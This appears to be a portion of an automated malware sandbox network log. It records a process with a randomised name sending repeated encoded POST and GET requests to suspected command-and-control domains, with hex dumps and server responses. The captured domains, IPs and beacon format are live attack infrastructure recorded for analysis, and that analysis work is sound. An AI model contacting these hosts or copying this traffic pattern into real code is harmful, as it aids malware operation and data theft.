                                                            Data Ascii: 3.545-15.289-21.356-31.774-21.431-11.253 0-19.933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.238
                                                            Dec 5, 2024 19:40:14.756881952 CET1236INData Raw: 33 2d 32 2e 35 33 34 2d 31 2e 33 34 31 2d 35 2e 30 30 32 2d 32 2e 34 30 39 2d 37 2e 33 36 2d 2e 33 30 34 2d 2e 36 37 2d 2e 39 38 36 2d 31 2e 30 38 38 2d 31 2e 37 32 31 2d 31 2e 30 35 34 2d 31 34 2e 34 2e 36 39 32 2d 32 38 2e 32 35 33 2d 33 2e 35
                                                            Data Ascii: 3-2.534-1.341-5.002-2.409-7.36-.304-.67-.986-1.088-1.721-1.054-14.4.692-28.253-3.567-33.715-10.325-.57-.708-1.58-.876-2.349-.391-6.87 4.196-11.795 10.946-13.693 18.769-.787-.194-1.6-.266-2.409-.211-8.006.467-7.482 8.624-7.333 12.04-.001 2.658.
                                                            Dec 5, 2024 19:40:14.756897926 CET1236INData Raw: 35 35 20 31 39 2e 33 38 34 7a 6d 33 32 2e 39 32 32 2d 32 36 2e 34 34 33 63 2d 2e 30 31 31 20 32 2e 30 39 38 2d 2e 34 34 39 20 34 2e 31 37 32 2d 31 2e 32 38 37 20 36 2e 30 39 35 2d 2e 37 31 38 20 31 2e 32 38 39 2d 32 2e 31 39 35 20 31 2e 39 35 36
                                                            Data Ascii: 55 19.384zm32.922-26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-4.425.355-.125.731-.181 1.107-.166h.449c1.474-.126 2
                                                            Dec 5, 2024 19:40:14.757006884 CET848INData Raw: 2e 39 31 35 2d 2e 32 37 36 2e 36 34 35 2d 2e 39 30 31 20 31 2e 30 37 32 2d 31 2e 36 30 32 20 31 2e 30 39 35 6c 2d 2e 30 31 33 2e 30 36 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 35 36 2e 33 39 20 36 34 2e 39 37
                                                            Data Ascii: .915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.105l-4.115-1.5c-.917-.361-1.38-1.387-1.043-2.313.337-.926 1.351-1.416 2.28
                                                            Dec 5, 2024 19:40:14.876812935 CET1236INData Raw: 37 2d 2e 30 33 38 2d 31 2e 37 37 36 2d 2e 38 37 37 2d 31 2e 37 33 38 2d 31 2e 38 37 34 2e 30 33 38 2d 2e 39 39 37 2e 38 37 37 2d 31 2e 37 37 36 20 31 2e 38 37 34 2d 31 2e 37 33 38 6c 31 35 2e 38 39 32 2e 35 38 37 20 32 2e 34 33 39 2d 38 2e 33 33
                                                            Data Ascii: 7-.038-1.776-.877-1.738-1.874.038-.997.877-1.776 1.874-1.738l15.892.587 2.439-8.338c.145-.658.646-1.18 1.297-1.352.651-.172 1.345.034 1.796.534.452.5.586 1.211.348 1.841l-2.825 9.693c-.232.793-.974 1.327-1.8 1.294z"/><path fill="#fc3" d="M46.9


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.749872104.21.41.74806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:40:20.432786942 CET817OUTPOST /m7wz/ HTTP/1.1
                                                            Host: www.conansog.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.conansog.shop
                                                            Referer: http://www.conansog.shop/m7wz/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 39 33 39 33 48 49 53 6e 6a 57 41 72 6e 61 74 72 6b 6a 41 78 74 53 75 6d 39 68 79 56 39 41 79 53 36 36 77 2b 46 70 37 78 4f 68 43 42 46 36 76 37 53 75 2f 53 34 33 33 70 74 35 6b 33 78 48 4f 7a 54 4e 49 6e 59 43 2b 34 38 72 52 4e 62 77 42 7a 43 42 39 66 68 6d 49 72 6d 54 37 34 38 42 39 5a 74 79 64 37 4c 6f 48 79 6b 72 74 65 75 49 79 31 33 58 75 63 65 34 68 67 4a 45 5a 65 61 73 30 64 58 6c 65 62 68 45 6a 71 79 2b 62 59 64 63 70 66 7a 6c 65 79 2f 74 69 35 6f 4b 2f 57 61 47 4b 35 59 5a 64 46 52 52 4a 52 4d 59 58 5a 50 31 48 78 47 61 2b 6d 57 74 4b 61 49 76 76 6e 62 77 58 79 78 69 34 71 6b 51 3d 3d
                                                            Data Ascii: wVb0=p1DRQC/le5qi9393HISnjWArnatrkjAxtSum9hyV9AyS66w+Fp7xOhCBF6v7Su/S433pt5k3xHOzTNInYC+48rRNbwBzCB9fhmIrmT748B9Ztyd7LoHykrteuIy13Xuce4hgJEZeas0dXlebhEjqy+bYdcpfzley/ti5oK/WaGK5YZdFRRJRMYXZP1HxGa+mWtKaIvvnbwXyxi4qkQ==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.749880104.21.41.74806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:40:23.094743967 CET837OUTPOST /m7wz/ HTTP/1.1
                                                            Host: www.conansog.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.conansog.shop
                                                            Referer: http://www.conansog.shop/m7wz/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 2f 55 6c 33 4c 4f 61 6e 7a 47 41 6b 72 36 74 72 79 54 42 34 74 53 71 6d 39 6b 57 37 39 79 6d 53 36 59 34 2b 45 6f 37 78 43 42 43 42 52 71 75 7a 50 2b 2f 46 34 33 79 57 74 37 41 33 78 48 61 7a 54 50 41 6e 59 31 43 37 2b 37 52 50 58 51 42 78 66 52 39 66 68 6d 49 72 6d 58 62 53 38 41 5a 5a 74 43 74 37 4c 4e 37 39 36 37 74 66 70 49 79 31 67 48 75 59 65 34 68 57 4a 46 46 30 61 70 77 64 58 6b 75 62 69 56 6a 74 38 4f 62 53 41 4d 6f 7a 79 57 6e 49 77 2f 2b 68 67 64 62 32 59 6b 62 63 64 76 63 6e 4c 7a 46 39 53 4a 76 69 4c 33 6a 48 52 38 6a 54 55 73 4f 43 46 4e 62 47 45 48 79 59 38 77 5a 75 79 67 37 38 76 38 39 59 64 52 35 70 68 6f 41 2b 67 4a 7a 46 65 47 63 3d
                                                            Data Ascii: wVb0=p1DRQC/le5qi/Ul3LOanzGAkr6tryTB4tSqm9kW79ymS6Y4+Eo7xCBCBRquzP+/F43yWt7A3xHazTPAnY1C7+7RPXQBxfR9fhmIrmXbS8AZZtCt7LN7967tfpIy1gHuYe4hWJFF0apwdXkubiVjt8ObSAMozyWnIw/+hgdb2YkbcdvcnLzF9SJviL3jHR8jTUsOCFNbGEHyY8wZuyg78v89YdR5phoA+gJzFeGc=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.749886104.21.41.74806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:40:25.763094902 CET1850OUTPOST /m7wz/ HTTP/1.1
                                                            Host: www.conansog.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.conansog.shop
                                                            Referer: http://www.conansog.shop/m7wz/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 2f 55 6c 33 4c 4f 61 6e 7a 47 41 6b 72 36 74 72 79 54 42 34 74 53 71 6d 39 6b 57 37 39 79 65 53 36 71 41 2b 46 4c 54 78 44 42 43 42 4f 61 75 79 50 2b 2f 45 34 33 4b 53 74 37 4d 34 78 46 69 7a 53 71 55 6e 54 68 57 37 33 37 52 50 4b 41 42 79 43 42 38 58 68 6d 59 6e 6d 54 2f 53 38 41 5a 5a 74 42 31 37 43 34 48 39 34 37 74 65 75 49 79 44 33 58 75 77 65 34 35 47 4a 46 78 4f 61 61 49 64 58 45 2b 62 79 33 4c 74 36 65 62 63 54 38 6f 72 79 58 62 74 77 2b 53 48 67 59 50 49 59 6b 7a 63 64 5a 46 77 54 6a 42 34 4a 4a 7a 63 45 68 72 55 64 50 58 48 54 74 47 4c 4b 2b 4c 70 46 55 32 6d 6b 6a 6b 6d 37 48 62 34 7a 65 42 6f 59 44 52 34 6b 2b 6c 41 6e 72 58 43 63 77 52 69 59 36 46 69 2b 61 50 6e 62 48 59 44 6a 71 6c 41 33 72 78 58 66 6f 6f 32 63 7a 63 39 6d 64 64 54 33 77 39 48 66 55 44 6e 4a 70 4f 51 74 30 5a 7a 57 43 38 53 57 39 78 52 5a 67 75 64 55 37 59 58 4c 5a 71 2f 4f 36 31 31 64 76 71 2b 6d 7a 39 33 79 5a 61 6e 69 4b 68 31 6e 36 69 78 41 78 67 69 58 50 44 70 74 [TRUNCATED]
                                                            Data Ascii: wVb0=p1DRQC/le5qi/Ul3LOanzGAkr6tryTB4tSqm9kW79yeS6qA+FLTxDBCBOauyP+/E43KSt7M4xFizSqUnThW737RPKAByCB8XhmYnmT/S8AZZtB17C4H947teuIyD3Xuwe45GJFxOaaIdXE+by3Lt6ebcT8oryXbtw+SHgYPIYkzcdZFwTjB4JJzcEhrUdPXHTtGLK+LpFU2mkjkm7Hb4zeBoYDR4k+lAnrXCcwRiY6Fi+aPnbHYDjqlA3rxXfoo2czc9mddT3w9HfUDnJpOQt0ZzWC8SW9xRZgudU7YXLZq/O611dvq+mz93yZaniKh1n6ixAxgiXPDptl5gn2e+0UY6z5YnpeI2Y4HWq0+p4v11vG1h14PhJ3+iEmymcAT7z2Prta2CvDthlKqBKkT9XaGmFU4GvN3/rXHkPQCKHYk9ka0nEC8H/jv6r0nXZyH4K8B42Qsrmwzz1i6gcfAORDzvM9szlibYPvFSKjx8yjA2/qixvVvvITw5TkIbbYJjwpxiBPRz+b3zmyidsukTGDYEdyTGRk7NZspTxQcyGEewL8ENwjLPRC9ivHCLADeuuPy33sDr8TgwHCh1jRoka+Okscfkdf6B+YIRA/MCrRWFWUkt/7tfqv4tOjoo0nyjmO+hA/ovg35f1KmncqJNyibvH4mMLFSpxjhap3i5AP3Q203FCFXQVwZ0UyxdLsZ17tx/6NEavQYp7hWoXG2ZcFd8t1sOevHfPCVwowft2r6Q+Yt5fgEDeE2E8ix2fE/VC1HHZMwe9RRpxv1C2GrTbVrp07sI7+DC3jc1f719LGyVJECtl+9D4DFR0qDsys0k3R4Ta2UFKZ54uGSeIYZnWDH2d2o6lRqd7N+zZwSomqfEjDOPbW+jOzht/kyj1ew2M598QX71OBIcK6ErxHCAENa/3teROY9XQjwIMuea4i99jbTgAqff5gU0gfwP+KWIG6i8q7l9CnBrDfMeHA5OEbWE1uW+LUCy6Gp2M1+QMFh/u60 [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.749892104.21.41.74806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:40:28.420234919 CET550OUTGET /m7wz/?wVb0=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.conansog.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:41:08.347903967 CET961INHTTP/1.1 522
                                                            Date: Thu, 05 Dec 2024 18:41:08 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 15
                                                            Connection: close
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LS0%2Fj5AkeXP%2FkAImuv1XvwobwcACeso04f18TnPCCm8iZOsjjCOg9phwkjcVdG6l5KHhz363LOyRcrtn9UBAOP6oExIg5x0kegF0%2B7MF%2Fyt9UF5TAwgn5WJlWu3xVTwbn0uXRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62a375def41c3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1798&rtt_var=899&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=70&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                            Data Ascii: error code: 522


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.74998485.159.66.93806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:14.595369101 CET823OUTPOST /80gy/ HTTP/1.1
                                                            Host: www.beythome.online
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.beythome.online
                                                            Referer: http://www.beythome.online/80gy/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 35 44 48 66 6d 71 4f 44 39 36 6a 70 32 2b 37 4f 64 34 52 53 6a 64 6d 43 74 7a 78 6f 45 32 63 31 41 47 46 42 66 6e 78 42 2b 48 5a 43 4e 58 58 4a 52 6f 38 49 6e 7a 71 52 62 53 74 4f 68 69 58 48 4d 35 6b 68 70 7a 2b 4e 78 4f 4f 71 42 45 67 31 50 51 49 34 6e 54 36 6a 4a 4f 59 62 59 74 64 6b 63 64 36 59 73 46 70 51 72 32 34 5a 6d 42 71 58 77 36 64 74 38 48 65 41 58 61 53 59 56 4a 49 72 68 56 37 6e 55 44 38 68 73 59 73 70 44 4b 38 4b 7a 30 71 35 79 78 49 4e 72 54 35 53 71 32 32 46 30 33 58 39 62 4c 41 77 59 62 44 37 72 36 63 70 6f 51 52 2f 41 52 36 77 36 50 50 76 55 32 52 61 48 46 6b 65 37 77 3d 3d
                                                            Data Ascii: wVb0=Xqn0ftDeUaM65DHfmqOD96jp2+7Od4RSjdmCtzxoE2c1AGFBfnxB+HZCNXXJRo8InzqRbStOhiXHM5khpz+NxOOqBEg1PQI4nT6jJOYbYtdkcd6YsFpQr24ZmBqXw6dt8HeAXaSYVJIrhV7nUD8hsYspDK8Kz0q5yxINrT5Sq22F03X9bLAwYbD7r6cpoQR/AR6w6PPvU2RaHFke7w==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.74998585.159.66.93806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:17.262343884 CET843OUTPOST /80gy/ HTTP/1.1
                                                            Host: www.beythome.online
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.beythome.online
                                                            Referer: http://www.beythome.online/80gy/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 36 6a 58 66 71 73 47 44 36 61 6a 6d 71 75 37 4f 54 59 52 57 6a 64 71 43 74 79 31 34 45 45 49 31 48 6a 35 42 65 6a 6c 42 77 6e 5a 43 44 33 58 41 66 49 38 44 6e 7a 32 33 62 51 4a 4f 68 6d 2f 48 4d 34 55 68 6f 41 57 4f 77 65 4f 53 4a 6b 67 33 53 41 49 34 6e 54 36 6a 4a 4b 49 78 59 74 31 6b 63 73 4b 59 75 6b 70 54 6c 57 35 72 6e 42 71 58 30 36 64 32 38 48 65 79 58 59 72 7a 56 50 55 72 68 58 6a 6e 56 53 38 69 6c 59 73 72 4d 71 39 59 2b 78 33 6c 74 42 4d 33 75 68 4a 70 79 6e 4b 38 78 42 57 66 42 70 4d 63 47 4b 37 41 76 34 34 66 2f 32 4d 4b 43 51 2b 6f 33 74 37 4f 4c 42 30 77 4b 58 46 61 74 43 63 52 6d 50 33 31 63 57 51 74 63 4b 56 73 48 61 6d 61 49 75 30 3d
                                                            Data Ascii: wVb0=Xqn0ftDeUaM66jXfqsGD6ajmqu7OTYRWjdqCty14EEI1Hj5BejlBwnZCD3XAfI8Dnz23bQJOhm/HM4UhoAWOweOSJkg3SAI4nT6jJKIxYt1kcsKYukpTlW5rnBqX06d28HeyXYrzVPUrhXjnVS8ilYsrMq9Y+x3ltBM3uhJpynK8xBWfBpMcGK7Av44f/2MKCQ+o3t7OLB0wKXFatCcRmP31cWQtcKVsHamaIu0=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.74998685.159.66.93806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:19.923261881 CET1856OUTPOST /80gy/ HTTP/1.1
                                                            Host: www.beythome.online
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.beythome.online
                                                            Referer: http://www.beythome.online/80gy/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 36 6a 58 66 71 73 47 44 36 61 6a 6d 71 75 37 4f 54 59 52 57 6a 64 71 43 74 79 31 34 45 45 77 31 41 52 42 42 65 45 4a 42 78 6e 5a 43 64 6e 58 4e 66 49 38 53 6e 7a 2b 7a 62 51 31 34 68 6b 48 48 4f 61 73 68 76 78 57 4f 36 65 4f 53 57 55 67 79 50 51 49 68 6e 54 71 6e 4a 4f 55 78 59 74 31 6b 63 76 53 59 67 6c 70 54 6e 57 34 5a 6d 42 71 44 77 36 63 34 38 48 32 59 58 65 32 49 56 5a 6b 72 68 33 7a 6e 59 42 55 69 71 59 73 31 41 4b 38 64 2b 78 7a 4d 74 42 51 52 75 6b 63 4d 79 6b 61 38 31 51 4c 54 54 36 51 32 46 72 44 4a 75 5a 38 64 38 47 73 46 49 54 36 54 33 4e 61 71 4f 42 31 52 43 45 4e 50 67 32 4e 48 2f 64 4c 61 46 56 73 6e 54 36 31 6a 5a 4a 2b 48 4d 71 54 6e 55 50 73 47 4f 6b 2b 6f 5a 2b 59 4e 45 65 6d 6a 47 6b 74 4b 44 46 61 42 6e 58 58 67 42 39 6f 57 6e 76 6d 6d 57 79 36 44 30 42 64 6b 36 48 55 32 6b 33 66 51 2f 43 56 59 64 4e 2b 51 50 2b 61 6e 4f 41 45 31 61 66 34 71 2f 4b 69 31 4f 58 39 47 37 75 32 42 4a 39 47 2b 42 71 47 79 6a 4e 72 58 4c 78 5a 2f 6b [TRUNCATED]
                                                            Data Ascii: wVb0=Xqn0ftDeUaM66jXfqsGD6ajmqu7OTYRWjdqCty14EEw1ARBBeEJBxnZCdnXNfI8Snz+zbQ14hkHHOashvxWO6eOSWUgyPQIhnTqnJOUxYt1kcvSYglpTnW4ZmBqDw6c48H2YXe2IVZkrh3znYBUiqYs1AK8d+xzMtBQRukcMyka81QLTT6Q2FrDJuZ8d8GsFIT6T3NaqOB1RCENPg2NH/dLaFVsnT61jZJ+HMqTnUPsGOk+oZ+YNEemjGktKDFaBnXXgB9oWnvmmWy6D0Bdk6HU2k3fQ/CVYdN+QP+anOAE1af4q/Ki1OX9G7u2BJ9G+BqGyjNrXLxZ/krXYacWt45uFuV8M/tWqbG/4BwXkZQzqSaEHi41yM6OBZhvlE9slZTh0X3iklaZhqG1Mezjvw9u+E4HyVsQ9Z4RGHtmOqjeLMpl4gjJTp2G7DAdT8K6+wDfkbm1eyYSAI2gnLrJKXeGh1DSjAXkqlC8ymjQZGOBP/1566ivw9x1xbnPZd49mzGqS3RJTqQOko/qcn0z4X1dJSMpyt8wxvoe0XeZAD3ENYkgj/ssseqkc/dnAjNigVfr3A14CKOiJ+F6nzkLKDIfkiC0mMxFTCryTN4wJjKtL9gEQH06YBLZLl3UAaheLZXo2GTe4q6NuxLV4tT6CtkiP4WnE+ghOR5tZuaVzTminkiuFVKdKEutUJRbpsdmVdMD/a9qfxNqLHsJ5dKA0dFnt1GPzHA3LsuvKjLCjXzoRMGrwDe1FW9Zi/pVIfFgB8nt4YNfl1fWVyS3BKSg+RFZm8wk4JCN0qODctPDwiQPrY8ZpSyMvD4td4B+I56yJLAMvIgFY6sVIuOiipcX793SwMBvlpOoTGC+c4jzldkVnB1c3p43YW2WGmLtRi5+iFUXvJZR8Av63bxKdrcJCNc0/+eercsAXhAKXSWPxVS/KUXHLWTZLpkha3itB9fkhT4t7BO0WQOvdcFOAR5vC7bPMBRr/MDQvGGC0B50onJnu0gr [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.74998785.159.66.93806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:22.591773987 CET552OUTGET /80gy/?wVb0=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.beythome.online
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:41:23.933490038 CET225INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.14.1
                                                            Date: Thu, 05 Dec 2024 18:41:23 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            X-Rate-Limit-Limit: 5s
                                                            X-Rate-Limit-Remaining: 19
                                                            X-Rate-Limit-Reset: 2024-12-05T18:41:28.7071560Z


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.749988103.21.221.4806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:29.873936892 CET844OUTPOST /0kli/ HTTP/1.1
                                                            Host: www.tempatmudisini06.click
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.tempatmudisini06.click
                                                            Referer: http://www.tempatmudisini06.click/0kli/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 49 50 64 41 32 43 56 4a 6a 55 6a 77 5a 47 73 65 4b 70 4f 74 6e 37 76 57 54 68 6a 2f 44 56 36 61 4a 63 4f 54 62 6b 49 6a 78 4e 6d 50 4d 30 51 4a 6c 74 7a 65 2f 67 59 31 49 56 56 33 66 6f 32 58 44 63 5a 43 50 5a 6d 76 64 74 74 5a 48 75 37 61 6c 6b 6d 72 33 41 4e 4a 61 38 63 53 39 6b 47 32 53 4d 6b 71 57 6e 32 34 2f 49 4b 56 38 5a 46 7a 59 61 30 52 71 51 58 79 57 74 77 58 4c 52 73 67 55 34 6b 47 52 68 6e 32 43 2f 44 72 56 6a 41 34 71 76 4a 34 56 42 69 65 35 62 53 2f 6e 6c 45 61 66 36 58 52 41 4a 75 53 61 65 49 50 5a 47 7a 64 67 30 78 74 76 37 42 32 34 61 7a 7a 6f 44 74 62 78 66 32 4d 77 51 3d 3d
                                                            Data Ascii: wVb0=IcIMsTazYCJeIPdA2CVJjUjwZGseKpOtn7vWThj/DV6aJcOTbkIjxNmPM0QJltze/gY1IVV3fo2XDcZCPZmvdttZHu7alkmr3ANJa8cS9kG2SMkqWn24/IKV8ZFzYa0RqQXyWtwXLRsgU4kGRhn2C/DrVjA4qvJ4VBie5bS/nlEaf6XRAJuSaeIPZGzdg0xtv7B24azzoDtbxf2MwQ==
